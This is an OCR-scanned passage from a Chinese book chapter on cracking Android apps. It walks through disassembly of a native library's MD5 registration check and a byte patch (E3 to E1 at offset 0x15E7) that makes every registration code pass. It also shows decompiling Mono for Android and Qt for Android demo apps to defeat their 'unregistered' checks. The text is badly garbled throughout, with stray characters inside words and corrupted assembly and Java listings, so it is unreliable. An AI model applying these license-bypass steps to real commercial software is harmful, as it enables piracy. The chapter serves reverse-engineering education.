000015FC CMP 
00001600 MOVEQ 
00001604 MOV 
00001608 MOVNE 
:0000160C BL 
00001610 
00001610 loc_1610 


00001610 

00001610 MOV 
00001614 LDMFD 
00001618 B 
0000161C 

0000161C setvaluel 


RO, R4 ; ptr 

fread ; 读 取 所 有 文件 内 容 到 分 配 的 内 存 中 

R1, =(a25d55ad283aa40 - 0x15B0) 

R8, #0 

R8, [R4,R6] ; 将 读 取 的 内 容 的 最 后 一 个 字符 设 为 0 

Hl: Be RL ; "25d55ad283aa400af464c76d713c07ad" 
RO, R4 和 

strcmp ; 比较 读 取 的 内 容 

RO, R8 

setValuel 

R1, =(a08e0750210£663 - 0x15CC ) 

RO, R4 区 注入 

民主 RE 浊 计 ; "08e0750210£66396eb83957973705aad" 
strcmp 

RO, #0 

setValue2 

R1, =(aB2dbl1l85c9e5b8 - 0x15E4) 

RO, R4 7 :8 

并 玉 天 本， 溪 1. ; "b2dbll85c9e5b88d9b70d7b3278a4947" 
strcmp 

RO, #0 

setValue3 

R1, =(al8e56d777d1l94c - 0x15FC ) 

RO, R4 全 时 

Rl; Pe RE ; "1l8e56d777d194c4d589046d62801501c" 
strcmp 

RO, #0 

R1, #4 ; SetValue4 

RO, R7 

KE ‘RB 

SetValue 


; CODE XREF: nl1+FCH 


; nl+10C|j 
RO, RS ; stream 
SP!, {R4-R8,LR} 
fclose 


; CODE XREF: nl1l+8C1j 


text: 
| 
text: 
"EXt: 
ER 
text: 
text: 
“Cex 
text: 
‘text: 
:text: 
oo 
‘text: 
“RE 
text: 
text: 
.text: 
“text: 
text: 
text: 
-text 
6 
.text: 
"text: 
texts 
text: 
:00001664 
text: 
.text: 
:text: 
text: 


:text 


0000161C 
00001620 
00001624 
00001628 
0000162C 
0000162C 
0000162C 
00001630 
00001634 
00001638 
0000163C 
0000163C 
0000163C 
00001640 
00001644 
00001648 
0000164C 
0000164C 
0000164C 
00001650 
00001654 
00001658 
0000165C 
0000165C 
0000165C 
00001660 


00001668 
0000166C 
00001670 
00001670 


MOV RO RT 

MOV 二 

BL setVvalue 

B T1062 J610 
setValue2 a 

MOV RO, R7 

MOV 二 产 浊 攻 

BL setValue 

B loc 1610 
SetValue3 2 

MOV RO, R?7 

MOV 及 和 3: 汪汪 

BL setVvalue 

B FO. L610 
return ; 

MOV RO, R7 

MOV Rl; RS 

LDMFD SP!, {R4-R8,LR} 

B SetValue 
goclosefile H 

MOV RO 及 5 - 

BL fclose 

MOV RF 

MOV Rl 4 

LDMF'D SP!, {R4-R8,LR} 

B SetValue 


; End of function nl 


CODE XREF: 


CODE XREF: 


CODE 


CODE XREF: 


stream 


XREF : 


nl+A41] 


nl+BC1]J 


nl+201j 


nl+481j 


这 段 代 码 是 一 系列 的 文件 读 写 函数 调用 ， 笔 者 对 其 加 了 详细 的 注 


释 ， 有 过 C 语 言 编程 基础 的 读者 应 该 一 眼 就 能 够 看 明白 具体 的 含义 。 代 








码 首先 打开 SD 卡 上 的 reg.dat 文 件 ， 如 果 失 败 驶 返回 ， 成 功 的 话 就 分 配 一 
块 内 存 来 读 取 它 的 内 容 ， 并 与 几 行 字符 串 进 行 比较 ， 最 后 根据 比较 的 结 
果 调 用 setValue(0) 函 数 设 置 MyApp 成 员 m 的 值 。 

到 这 里 ， 程 序 的 验证 思路 算是 弄 明 白 了 ， 但 验证 时 这 些 奇怪 的 字符 
串 是 如 何 计算 出 来 的 呢 ? 这 就 要 去 看 saveSNO 对 应 的 n20 函 数 的 代码 
了 ， 笔 者 实际 上 是 调用 C 语 言 版 的 MD5 函 数 来 加 密 注 册 码 ， 分 析 过 程 
中 ，IDA Pro 成 功 的 识别 了 MD5 算 法 中 的 几 个 函数 ， 加 密 后 的 4 个 字符 串 
分 别 是 “12345678”、“22345678”、“32345678” 与 “42345678” 的 MD5 值 ， 
有 兴趣 的 读者 可 以 使 用 算法 工具 计算 一 下 。 

现在 可 以 使 用 上 面 4 个 字符 串 中 的 任意 一 个 作为 注册 码 来 进行 注册 
了 ， 不 过 我 们 扩展 下 内 容 ， 来 尝试 破解 一 下 该 程序 。 从 上 面 的 分 析 得 
知 ， 破 解 的 关键 点 可 以 是 n10， 也 可 以 是 n30， 经 过 仔细 考虑 发 现 修改 
n10 函 数 更 合适 一 些 。n10 函 数 中 有 4 个 字符 串 比 较 ， 我 们 可 以 在 比较 时 
让 其 直接 跳 转 到 相应 的 setValueX 标 号 即 可 。 比 较 的 判断 条 件 是 指 
令 “CMP R0，#0”， 对 应 的 字 节 码 是 “00 00 50 E3”， 我 们 可 以 将 其 改 
为 “CMP R0，R0” 让 比较 结果 永远 返回 真 ， 对 应 的 字 节 码 为 “00 00 50 
E1”， 笔 者 想 要 使 用 企业 版 功能 ， 只 需要 修改 0x15E4 行 的 “00 00 50 
E3” 为 “00 00 50 E1”， 实 际 上 只 需要 修改 0x15E7 的 E3 为 El1， 使 用 C32asm 
打开 libjuan.so 文 件 进 行 相应 的 修改 ， 然 后 重新 打包 Ndkapp 程 序 。 初 次 运 
行 打包 后 的 程序 ， 会 提示 未 注册 ， 随 便 输入 注册 码 后 重新 启动 程序 ， 就 
会 发 现 程序 已 经 破解 成 功 了 ， 如 图 9-16 所 示 ， 现 在 的 Ndkapp 已 经 是 企业 
版 了 。 
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感谢 您 购买 企业 版 程序 ! 





图 9-16 ”破解 Ndkapp 程 序 


通过 上 面 的 破解 步骤 我 们 可 以 看 到 ， 使 用 Native 代 码 编写 的 文件 可 
以 直接 通过 修改 文件 的 内 容 来 达到 破解 的 目的 。 但 如 何 找到 破解 关键 
点 ， 以 及 如 何 巧 妙 的 修改 字 节 人 码 ， 还 需要 读者 在 实际 的 破解 过 程 中 多 总 


结 经 验 。 


9.7 ”如 何人 破解 其 它 类 型 的 Android 程 序 


除了 使 用 Google 官 方 推荐 的 Java 语 言 与 C/C++ 语言 开发 Android 程 序 
外 ， 还 可 以 使 用 其 它 形形色色 的 语言 来 开发 Android 程 序 。 接 下 来 我 们 
看 看 ， 如 何 破 解 其 它 语言 编写 的 Android 程 序 。 





9.7.1 Mono for Android 开 发 的 程序 及 其 破解 方法 





Mono for Android 可 能 是 用 得 最 多 的 第 三 方 Android 软 件 开 发 包 了 ， 
它 允 许 开 发 人 员 使 用 C# 语 言 编写 Android 程 序 。Mono for Android 的 官方 
网 站 为 :http://Xxamarin.com/monoforandroid， 开 发 人 员 可 以 在 官网 上 下 
载 Mono for Android 开 发 环境 的 试用 版 。 下 载 到 单独 的 安装 文件 后 直接 
在 系统 中 运行 ， 安 装 文件 会 指导 开发 人 员 在 线 安装 完成 ， 在 安装 过 程 
中 ， 开 发 人 员 可 以 选择 安装 Visual Studio 2010/2012 的 插件 ， 这 样 就 可 以 
在 Visual Studio 集 成 开发 环境 中 开发 Android 程 序 了 ， 如 果 用 户 未 使 用 过 
Visual Studio 也 没有 关系 ， 可 以 安装 MonoDevelop 作 为 Android 程 序 开发 
环境 。 

一 个 有 趣 的 现象 是 Mono for Android 的 Windows 版 本 安装 文件 名 为 
setup.exe， 如 果 安 装 前 更 改 setup.exe 为 其 它 名 字 ， 该 程序 会 拒绝 安装 ， 
另外 ， 安 装 时 setup.exe 会 检测 本 机 是 否 已 经 安装 有 Android SDK， 如 果 
没有 安装 则 会 在 线 下 载 安 装 ， 但 经 过 笔者 测试 ， 不 管 是 使 用 zip 包 加 系 
统 变量 的 方式 配置 的 Android SDK， 还 是 下 载 exe 安 装 版 的 Android 
SDK，setup.exe 都 会 检测 失败 ， 这 意味 着 需要 让 它 从 网 络 上 慢 慢 的 下 载 
一 份 Android SDK， 这 着 实 让 人 很 郁 间 ， 目 前 Mono for Android 的 最 新 版 
本 为 4.2， 希 望 后 期 版 本 会 修正 这 个 问题 。 安 装 完 Mono for Android 后 ， 
就 可 以 双击 加 面 上 的 MonoDevelop 图 标 来 启动 开发 环境 了 。 点 击 末 单 














项 “文件 ,New -Solution” 会 弹出 新 建 解决 方案 对 话 框 ， 如 图 9-17 所 示 ， 
Mono for Android 默 认 提供 了 6 种 类 型 的 Android 工 程 。 


oid Library Project 

ovoid Java Bindines Library 
oid Application 

oid Honeycomb Application 


oid Ice Cream Sandwich Application 





oid DpenGL Application 


名 称 和 这 ) ; 

位 置 马 ) : C:\documents| 
解决 方案 名 (8) : 

工程 将 被 保存 在 C:\documents 


























图 9-17 使 用 MonoDevelop 创 建 Android 工 程 





在 安装 测试 MonoDevelop 开 发 的 Android 程 序 时 ，MonoDevelop 会 自 
动 回 AVD 中 安装 Mono for Android 运 行 时 环境 。 其 实 就 是 两 个 apk 文 件 ， 
一 个 是 与 系统 版 本 相关 的 Mono.Android.Platform.apk， 它 提供 了 对 不 同 
版 本 SDK 特 性 的 支持 ， 如 Android ”v4 控件 、GoogleMaps、OpenTK 的 支 
持 ;， 男 一 个 是 与 处 理 占 相关 的 运行 库 ，Mono for Android SDK 中 提供 了 
对 armeabi、armeabi-v7a、x86 这 3 种 处 理 器 指令 集 的 支持 ， 所 有 的 运行 
库 的 文件 名 都 以 *Mono.Android.DebugRuntime-” 开 头 ， 例 如 ARM 指 令 集 
的 手机 需要 安装 的 运行 库 为 Mono.Android.DebugRuntimearmeabi.apk， 
这 个 运行 库 实际 上 是 .NET 的 运行 环境 ， 包 含 了 所 有 的 .NET 程 序 集 

(.NET 平 台 的 DLL 动 态 链 接 库 喘 文 称 为 Assembly， 中 文 称 之 为 程序 

集 ) 。 运 行 库 安装 完成 后 就 可 以 在 AVD 中 调试 Mono for Android 程 序 
到 

















发 布 Mono for Android 程 序 需要 获取 商业 授权 许可 ， 人 否则 是 无 法 生 
成 发 布 版 apk 文 件 的 ， 只 能 生成 在 模拟 器 上 运行 的 测试 版 apk 文 件 。 无 论 
是 发 布 版 还 是 测试 版 ， 在 Mono for Android 生 成 的 apk 文 件 的 lib 目 录 中 ， 
都 有 一 个 libmonodroid.so 动 态 库 ， 该 文件 就 是 Mono for Android 程 序 运 行 
的 基础 。 测 试 版 的 apk 文 件 中 ， 该 文件 主要 是 通过 与 前 面 介绍 的 两 个 apk 
运行 环境 通信 来 执行 程序 功能 的 ， 本 质 上 它 就 是 一 个 负 员 功能 转发 
的 “ 空 欧 "， 目 前 ARM 架 构 版 本 的 该 文件 大 小 为 63976 字 闻 。 发 布 版 的 apk 
文件 中 ，libmonodroid.so 不 再 需要 与 前 面 介 绍 的 运行 环境 进行 通信 ， 目 
号 就 拥有 了 上 所 需要 的 全 部 功能 。 文 件 大 小 也 增加 到 了 2.66 MB， 而 且 发 
布 版 的 apk 文 件 中 多 出 了 一 个 assemblies 目 录 ， 它 里 面 存放 着 软件 运行 时 
所 需 的 DLL 动态 链接 库 。 

本 小 市 的 实例 sharpapp 为 一 个 Mono for Android 开 发 的 友 布 版 程序 ， 
在 AVD 上 运行 效果 如 图 9-18 所 示 ， 点 击 按钮 ， 会 弹出 “unregister 


version!” 的 提示 。 
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图 9-18 ”Mono for Android 演 示 程 序 


现在 我 们 的 需求 是 : 破解 该 软件 ， 使 其 成 为 “正式 ”版 。 

下 面 开 始 动手 ， 首 先 使 用 dex2jar 将 本 小 节 实 例 
com.droider.sharpapp.apk 转 换 成 jar 文 件 ， 然 后 使 用 jd-gui 定 位 到 sharpapp 
类 的 OnCreate ”0 方法 。 如 图 9-19 所 示 ，OnCreate() 方 法 的 实现 转移 到 了 
Native 的 n_onCreate() 方 法 中 。 


感 Java DecoapIiler 一 上 ctivit7l.class 

File Edit Navieate Search lelp 

区 | 锯 有 元 | 多 中 

l com.droider.sharpapp_signed.apk.dex2jar.jar x es 


E+ ey es Activityl.class x IGCUserPeer,class 
com. droider. sharpapp 

由 - 国 了 { 
mono if (lygetClass() == Activityl.class) 
刀 android { 
出 java Dbject[] arrayO0fObject = new Object[0]; 
国 WonoPackagellanager TypeManager. Activatel"sharpapp.Activityl, sharpapp, Yersion=1.0.0.0, Culture=neutra; 
国 NonoPackagellanager Resources } 
因 NonoRuntimeProvi der } 
opentk 
opentk 1.0 private native void n_onCreatelBundle paramBundle); 
sharpapp 
四 Activityl public void monodroidhddReferencel0bject paramObject) 
日 -图 Activityl { 











回 出 出 册 田 田 田 田 田 出 


a5 _md methods : String if (this.refList == null) 

refList : ArrayList { 

Activityl O ArrayList localArrayList = new ArrayListl); 

monodroidAddReference (Dbject) : void this.refList = localArrayList; 

monodroidrlearReferences () : void } 

n_onCreate (Bundle) : void boolean bool = this.refList.addiparamObject); 
te (Bundle) } 


©Omoo0o0P 


public void monodroidClearReferences!) 
{ 
if (this.refList != null) 
this.refList.cleari(); 
} 


public void onCreate(Bundle paranBundle) 
{ 

n_onCreatelparamBundle); 
} 














图 9-19 ”使 用 jd-gui 分 析 反 编译 的 jar 文 件 
再 来 看 下 面 的 代码 : 


static final String maq_methoqs = 
"n_onCreate: (Landroid/os/Bundle;)V:GetOnCreate Landroid os_Bundle 
Handler\n"; 
static 
{ 
String str = __md methods; 
Runtime.register! 
"sharpapp.Activityl, sharpapp, Version=1.0.0.0, Culture=neutral, 
PublicKeyToken=null", 
ZOELYEILtYL .CIASS, StE) 
} 
Dale ty 
{ 
if (getClass() == Activityl.class) 
{ 
Object [] arrayOofObject = new Object[0]; 
TypeManager .Activatel 
"sharpapp.Activityl, sharpapp, Version=1.0.0.0, Culture=neutral, 
PublicKeyToken=null1", 
no DB arravorfobject)s 
} 








} 

看 到 这 段 代 码 读者 肯定 会 觉得 奇怪 ， 在 代码 初始 化 的 时 候 调 用 了 两 
个 奇怪 的 方法 。 首 先是 Runtime 类 的 register0) 方 法 ， 它 的 作用 是 向 Dalvik 
运行 环境 注册 sharpapp.Activity1 类 。 为 什么 要 注册 这 么 一 个 类 呢 ? 其 
实 ， 每 一 次 调用 托管 代码 (本 书 所 讲 的 托管 代码 均 指 C# 语 言 编写 的 代 
码 ) 编写 的 方法 时 ，Mono for Android 运 行 环 境 都 需要 先 调用 在 Java 层 提 
供 的 一 段 代理 方法 的 代码 (这 里 的 代理 指 的 是 它 不 是 直接 的 功能 代码 ， 
而 是 功能 代码 的 调用 代码 。〉， 这 上 段 Java 代 理 代 人 码 的 方法 声明 与 托管 代 
码 的 方法 声明 完全 一 致 ， 并 且 两 者 的 基 类 与 构造 函数 也 完全 相同 ， 这 样 
Mono for Android 运 行 环境 就 知道 了 需要 调用 的 是 哪个 托管 方法 ， 虽 然 
拐 了 个 大 弯 ， 但 还 是 达到 了 调用 托管 代码 的 目的 。 这 种 代理 方法 的 技术 
在 Mono for Android 中 叫做 ACW (Android callable wrappers，Android 调 
用 包装 器 ) 。 这 样 问题 就 来 了 ， 每 一 个 托管 代码 实现 的 虚 方 法 或 接口 方 
法 都 有 一 个 ACW， 难 不 成 使 用 C# 写 个 Android 程 序 ， 还 需要 另外 写 一 份 

















Java 代 码 ? 其 实 完 全 没有 这 个 必要 ， 因 为 这 段 代 码 对 开发 人 员 来 说 是 不 
可 见 的 ， 在 编译 生成 apk 文 件 时 ，monodroid.exe 会 自动 为 其 生成 ACW 代 
码 。 代 码 中 另外 一 个 被 调用 的 方法 是 TypeManager 类 的 Activate0， 从 名 
称 判 断 ， 它 应 该 执行 一 个 “激活 ?动作 ， 的 确 没 错 ， 当 局 动 Activity1l 时 ， 
Activity1 的 ACW 会 被 调用 ， 首 先 执 行 的 就 是 它 的 构造 函数 Activity10)， 
其 中 调用 Activate() 方 法 的 作用 就 是 引发 托管 代码 的 构造 函数 被 调用 。 男 
外 ，register() 方 法 与 Activate() 方 法 传递 的 第 一 个 参数 都 是 一 行 长 长 的 字 
符 串 ， 它 束 是 托管 代码 的 元 数据 (关于 托管 代码 元 数据 的 介绍 读者 可 以 
参看 C# 语 言 的 开发 书籍 ) ， 作 用 就 是 供 运 行 环境 找到 正确 的 程序 集 。 

关于 Mono for Android 架 构 方面 的 内 容 笔 者 就 不 再 详 述 了 ， 有 兴趣 
的 读者 可 以 访问 官方 的 在 线 文 档 
http://docs.xamarin.com/android/advanced_topics/architecture 来 了 解 更 多 的 
信息 。 

既然 Java 层 的 代码 都 只 是 些 代理 代码 ， 那 我 们 就 可 以 不 用 再 看 它 
了 ， 直 接 查 看 托管 代码 即 可 。 托 管 代码 在 apk 文 件 的 assemblies 目 录 下 ， 
本 实例 的 托管 代码 在 sharpapp.dll 文 件 中 ， 下 面 的 工作 就 是 分 析 这 个 DLL 
了 。.NET 编 程 语言 的 出 现 已 经 有 些 年 涉 了 ， 基 于 该 平台 的 反 编 译 技术 已 
经 非常 成 熟 ， 目 前 有 很 多 优秀 的 反 汇编 工 具 能 够 直接 反 汇 编 出 .NET 程 序 
集 的 源码 ! 笔者 在 此 推荐 一 款 强 大 的 .NET 反 汇编 工具 ILSpy， 它 是 一 款 
开源 的 .NET 反 汇编 工具 ， 官 方 网 站 为 http://ilspy.net。 使 用 编译 好 的 
ILSpy.exe 打 开 sharpapp.dll 文 件 后 ， 反 编译 效果 如 图 9-20 所 示 。 























File View Debugger Yisualizer Help 


QO SD = 人 | 金 | 得 | 
i I /7 sharpapp,Actvity1 
-BB System 当日 protected override yoid OnCreate(Bundle bundle) 
| 
| { 





* 喇 System.Core ! 

-DD Svaten Wal | base.OnCreate(bundle); 

Sytem lanl | this,SetContentyiew(2130903040); 

A ee base,Title = "Mono for Android 演 示 程 序 "; 

.BP iont Button button = base.FindViewById<Button>(2131034112); 
A button.Click += delegate 

-器 PresentationFramework 


ICSharpCode. TreeView 
"3 Nono. Cecil 
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图 9-20 ”使 用 ILSpy 反 编译 sharpapp.dll 


至 于 接 下 来 的 破解 已 经 没什么 好 讲 了 ， 直 接 复制 Activity1 的 代码 ， 
重新 使 用 MonoDevelop 上 自己 编写 一 个 同样 功能 的 程序 即 可 。 

Mono for Android 开 发 的 软件 使 用 了 C# 语 言 编 写 的 程序 集 作为 其 功 
能 核心 ， 如 果 不 采 用 代码 混 消 或 其 它 的 保护 手段 ， 则 开发 出 的 商业 软件 
宣 无 安全 性 可 言 。 


9.7.2 Qtfor Android 开 发 的 程序 及 其 破解 方法 














Qt for Android 是 Qt 界面 框架 针对 Android 系 统 的 移植 项 目 ， 访 项目 
命名 为 Necessitas， 其 官方 网 站 为 http://necessitas.kde.org/。Necessitas 的 
安装 很 简单 ， 首 先 从 官网 下 载 它 的 安装 文件 ，Windows 平 台 下 为 一 个 








exe 安 装 包 ， 双 击 运行 安装 包 ， 按 照 癌 导 提 示 的 步骤 不 停 地 点 “下 一 
步 ? 即 可 安装 完成 。Necessitas 目 前 的 最 新 版 本 为 aljpha 4.1， 安装 过 程 会 
联网 下 载 所 需要 的 文件 ， 整 个 安装 过 程 会 占用 大 约 2.5G 的 磁盘 空间 ， 笔 
者 的 XP 虚拟 机 空间 不 足 ， 因 此 将 其 安装 到 本 地 的 Windows 7 系统 中 。 

Qt for Android 的 集成 开发 环境 是 Qt Creator， 启 动 Qt Creator 后 ， 点 
击 亲 单项 “File New File or Project” 会 弹出 创建 工程 对 话 框 ， 如 图 9-21 所 
示 ， 在 “Files and Classes” 中 选择 “Mobile Qt Application” 后 点 击 Choose 按 
钮 就 会 打开 Android 工 程 创建 回 导 ， 跟 着 向 导 不 集 点 击 “ 下 一 步 ” 就 会 完 
成 工程 的 创建 。 
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图 9-21 使 用 Qt Creator 创 建 Android 工 程 


编写 Qt for Android 程 序 需 要 使 用 C++ 语言 ， 有 过 Qt 开发 经 验 的 读者 
可 以 很 快 上 手 。 下 面 来 看 看 本 小 节 的 实例 程序 Qtandroidapp。 在 AVD 中 
安装 该 程序 后 ， 首 次 运行 会 弹出 提示 框 请 求 安装 Ministro 服 务 ， 如 图 9- 
22 所 示 ， 点 击 OK 按 钮 后 ， 程 序 会 并 跳 转 到 Ministro 服 务 程序 的 下 载 页 
面 。 
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图 9-22 ”首次 运行 实例 需要 安装 Ministro 服 务 


如 果 AVD 中 没有 安装 Android 市 场 ， 则 程序 会 运行 失败 ， 这 个 时 候 
我 们 可 以 到 Qt for Android 官 方 网 址 
http://files.kde.org/necessitas/installer/release/Ministro%20II.apk 下 载 
Ministro 服 务 程序 后 安装 到 AVD 中 。 再 次 运行 实例 程序 ，Ministro 会 联网 
下 载 所 需 的 运行 库 ， 如 图 9-23 所 示 。 
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图 9-23 ”Ministro 正 在 下 载 所 需 的 运行 库 


当 运 行 库 下 载 完 后 程序 就 能 正常 运行 了 ， 程 序 正常 启动 后 的 界面 如 
图 9-24 所 示 。 
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图 9-24 ”Qt for Android 演 示 程 序 


点 击 执行 功能 后 ， 软 件 会 弹出 程序 未 注册 的 提示 框 ， 我 们 下 面 来 看 
看 如 何 破 解 它 。 首 先 使 用 dex2jar 将 Qtandroidapp.apk 转 换 成 jar 文 件 ， 然 
后 使 用 jd-gui 打 开 ， 人 发现 com.droider.qtapp 包 下 面 除 了 R 与 BuildConfig 类 
外 ， 没 有 其 它 的 代码 ， 如 图 9-25 所 示 。 


全 Java Decompiler - QtActivity.class 
Fle Edt Navigate Search Help 


巴 | 外交 | 中 昌 
Qtandroidapp.apk.dex2jar.jar x 





日 - 宙 android.annotation 


QtActivity.class x 


lpackage org.kde.necessitas.origo; 


由 - 国 SuppressLint 


-| 站 TargetApi 
央 com.droider.qtapp Blimport android.app.Activity; 
| 科 BuildConfig 
二 

出 











R Ipublic class QtActivity extends Activity 


org.kde.necessitas 





I{ 
| 
日 private static final String APPLICATION PARAMETERS = ; 

private static final String APPLICATION PARAMETERS KEY = "app- 


private static final String APPL ICaTITON TITLE KEY = "applicat: 


内 ministro 
9 IMinistro 
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IMinistroCallback 


QtActivity$1 


| QtActivity$2 


QtActivity$3$1$1 
QtActivity$3$1 
QtActivity$3 


] QtActivity$4 


QtActivity$5 

















private static 
private static 
private static 
private static 
private static 
private static 
private static 
private static 
private static 
private static 
private static 


IT 


final String BUNDLED LIBRARIES KEY = "bundled.- 
final String DEX PATH FEY = "dex.path"; 

final String ENVIRONMENT VARIABLES = "QT USE A 
final String ENVIRONMENT VARIABLES KEY = "envil 
final String ERROR CODE KEY = "error.code™; 
final String ERROR MESSAGE KEY = "error.measagt 
final int TOA ES ERS LN = 1; 
final String LIB PATH KEY = "lib. Dk 

final String LOADER ， CLASS | NAME KEY = "loader.c-. 
final String MAIN LIBRARY KEY = “main.library": 


final String MITNIMDM ， MINISTRO API KEY = “minim v 


» 





图 9-25 ”使 用 jd-gui 分 析 反 编译 的 jar 文 件 


Qt for Android 编 写 的 程序 不 以 Activity 为 核心 ， 程 序 的 功能 与 界面 
的 显示 都 是 依靠 Native 层 的 so 动态 库 ， 下 面 我 们 来 证 实 这 一 点 。 首 移 下 
载 Necessitas 的 源码 ， 目 前 最 新 版 本 为 4.8.2-411， 官 方 下 载 地 址 为 
http://files.kde.org/necessitas/sdk_alpha4/org.kde.necessitas.android.qt.src/4. 
8.2-411qt-src.7z。 下 载 完 源 人 码 后 我 们 从 QtActivity 的 OnCreate() 开 始 ， 
踩 源 码 中 方法 的 调用 流程 。 

所 有 Qt for Android 程 序 的 主 Activity 
为 “org.kde.necessitas.origo.QtActivity”， 并 且 它 的 代码 是 由 Necessitas 
SDK 提 供 的 。 在 OnCreate() 方 法 中 ， 代 码 首先 设置 程序 的 标题 栏 为 无 标 
题 ， 然 后 调用 了 startApp(0) 方 法 。startApp(0) 方 法 会 检查 传递 过 来 的 Intent 
是 否 包 含 “use_local_qt_libs” 键 值 ， 其 作用 是 判断 程序 是 否 使 用 本 地 的 Qt 
运行 库 ， 如 果 是 ， 束 收集 本 地 Qt 库 的 信息 ， 最 后 调用 loadApplication() 加 
载 程序 ， 反 之 ， 则 调用 bindService0) 绑 定 远程 的 Ministro 服 务 ， 














bindService0O) 会 判断 是 否 发 生 异 常 ， 如 果 发 生 异 第， 说 明 手 机 可 能 没有 
安装 Ministro 服 务 ， 此 时 会 调用 downloadUpgradeMinistro0 弹 出 提示 框 ， 
提醒 用 户 下 载 安装 Ministro 服 务 程序 。 当 bindServiceO 返 回 成 功 后 ， 
m_ministroConnection 类 的 onServiceConnected() 方 法 会 被 调用 ， 此 时 代码 
会 通过 AIDL 的 方式 调用 IMinistro 接 口 的 requestLoader() 方 法 ， 并 传递 进 
去 一 个 IMinistroCallback 回 调 接口 类 ， 回 调 接 口 类 的 loaderReady() 方 法 被 
远程 服务 调用 ， 从 而 执行 QtActivity 类 的 loadApplication0 方 法 ， 
loadApplication() 首 先 通 过 DexClassLoader 方 式 加 载 QtLoader 类 ， 这 个 
QtLoader 类 默认 指定 的 类 名 

为 “org.kde.necessitas.industrius.QtActivityDelegate”， 为 了 便于 描述 ， 下 
面 将 该 类 简称 为 QtActivityDelegate 类 ，QtActivityDelegate 类 的 实现 属于 
Qt 运行 库 的 部 分 ， 位 于 QtIndustrius-14.jar 文 件 中 ， 其 中 14 是 笔者 AVD 上 
安装 Qt 依赖 库 时 下 载 的 版 本 ， 不 同 版 本 的 AVD 可 能 会 有 所 不 同 ， 在 
Necessitas 源 人 码 中 查找 其 实现 ， 最 终 在 Android\Qt\482\gt-src\src\android 日 
录 下 找到 了 QtIndustrius 工 程 的 代码 。 

回 到 上 面 的 分 析 ， 当 QtActivityDelegate 类 加 载 完 成 后 ， 
loadApplication0O 会 通过 反射 机 制 调 用 其 loadApplication() 方 法 ， 
QtActivityDelegate 的 loadApplication() 方 法 会 调用 QtNative 类 的 
loadQtLibrariesO 与 joadBundledLibrariesO0 加 载 Qt 运行 库 。 接 着 ， 
QtActivity 的 loadApplication0 会 调用 QtApplication 类 的 
setQtActivityDelegate() 方 法 设置 Activity 委 托 (委托 即 Delegate 机 制 ， 是 
在 .NET 开 发 中 常用 的 一 种 机 制 ， 类 似 于 Java 的 监听 器 〉， 该 方法 设置 了 
静态 成 员 m_delegateObject 与 静态 成 员 m_delegateMethods 的 值 ， 前 者 用 
来 判断 程序 是 否 已 经 设置 Activity 委 托 ， 后 者 则 保存 了 已 经 被 委托 的 方 
法 。 经 过 这 一 步 后 ， 程 序 的 控制 权 就 转移 给 了 QtActivityDelegate 类 。 接 
着 ，loadApplication0 调 用 了 loadLibrary0O 来 加 载 上 自身 的 so 动态 库 ， 最 后 
调用 了 QtActivityDelegate 类 的 startApplication() 方 法 启动 程序 。 正 如 前 面 




















看 到 的 那样 ，QtActivityDelegate 其 实 自 己 什么 都 不 做 ， 它 只 是 个 “ 托 ”， 
它 会 调用 QtNative 类 的 ed 行程 序 ， 该 方法 为 
Native 方 法 ， 其 代码 主要 过 dlopen0O 打 开 程序 自身 的 so 动态 库 ， 然 后 
调用 dlsym() 查 找 so 动 态 库 0 
至 此 ，Qt for Android 程 序 的 启动 流程 就 算 弄 明白 了 ， 整 个 过 程 错 综 
复 架 ， 最 后 只 是 调用 了 程序 本 里 的 运行 库 而 已 。 下 面 理 清 一 下 思路 ， 其 
完整 的 执行 流程 如 图 9-26 所 示 。 
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IMinistro 和 的 requestLoader() 
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执行 回调 loaderReady() 
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unbindService() 
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图 9-26 ”Qt for Android 程 序 启动 流程 





既然 程序 的 核心 在 so 动态 库 里 面 ， 那 其 它 什 么 的 就 不 去 理会 了 。 使 
用 解压 缩 工具 解压 出 apk 文 件 lib 目 录 下 的 libqtandroidapp.so， 打 开 IDA 
Pro， 然 后 并 将 它 拖 入 主 窗口 进行 分 析 。 分 析 Qt 程 序 需 要 读者 事先 了 解 
Qt 程序 开发 的 流程 ， 一 个 典型 的 Qt 程序 的 代码 框架 如 下 : 
int mainl(int argc, char *argv[]) 
{ 
QApplication applargc, argv); 
MainWindow mainWindow:; 
mainWindow.setOrientation (MainWindow: :ScreenOrientationAuto); 


mainWindow.showMaximized!(); 


return app.exec(); 


} 

程序 的 界面 显示 与 事件 响应 都 依赖 这 个 MainWindow， 我 们 可 以 在 
MainWindow 的 构造 函数 中 查找 connectO 函 数 调用 ， 或 者 逐个 分 析 
MainWindow 类 的 成 员 方 法 。 笔 者 采用 前 一 种 方法 找到 相应 的 反 汇 编 代 
码 如 下 。 


text:00003B5C ; MainWindaow::MainNWindow(QmWwidget *) 
text:00003B5C EXPORT _ZNl0OMainWindowClEP7QOWidget 
text:00003B5C _ZNl0OMainWindowClEP7QWidget 

text:00003B5C 

text :00003BB0 

text:00003BB0 loc_3BB0 

text:00003BB0 MOVS RO Rs 

text:00003BB2 BL _ZN7OStringDlEv ; QString::~QString!() 
text:00003BB6 ; -----------------------------------------—- 
text:00003BB6 LDR R3, [R4,#0x14] 

text:00003BB8 LDR R1, =(a2clicked - 0x3BC6) 
text:00003BBA MOVS R2, #0 

text:00003BBC LDR RO, [R3,#0x10] 

text:00003BBE LDR R3, =(alonbuttonclick - 0x3BC8) 
text:00003BC0 STR R2, [SP,#0x20+var_20] 

text:00003BC2 ADD RE;: PE T2201CGkEd() 
text:00003BC4 ADD R3, PC ; "lonButtonclicked()" 
text:00003BC6 MOVS R2, R4 

text:00003BC8 BL sub_5510 ;调用 Qobject: :connect () 函数 
text:00003BCC 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 
text:00003BCC B 16c .3BDC 

text:00003BDC 

text:00003BDC loc_3BDC 

text:00003BDC ADD SP5 "SP; 水 0OxL0 

text:00003BDE MOVS RO, R4 

text:00003BE0 POP {R4-R6, PC} 

.text:00003BE0 ; End of function MainWindow: :MainWindow (QWidget *) 


这 段 代 人 码 调用 QObject 类 的 connectO) 函 数 将 按钮 的 点 击 事 件 与 
onButtonclicked() 方 法 关联 。 其 中 的 “BL sub_5510” 函 数 调 用 非常 有 趣 ， 
它 的 代码 如 下 。 

.text:00005510 sub_5510 

.text:00005510 BX 

.text:00005512 ALIGN 4 


.text:00005512 ; End of function sub 5510 
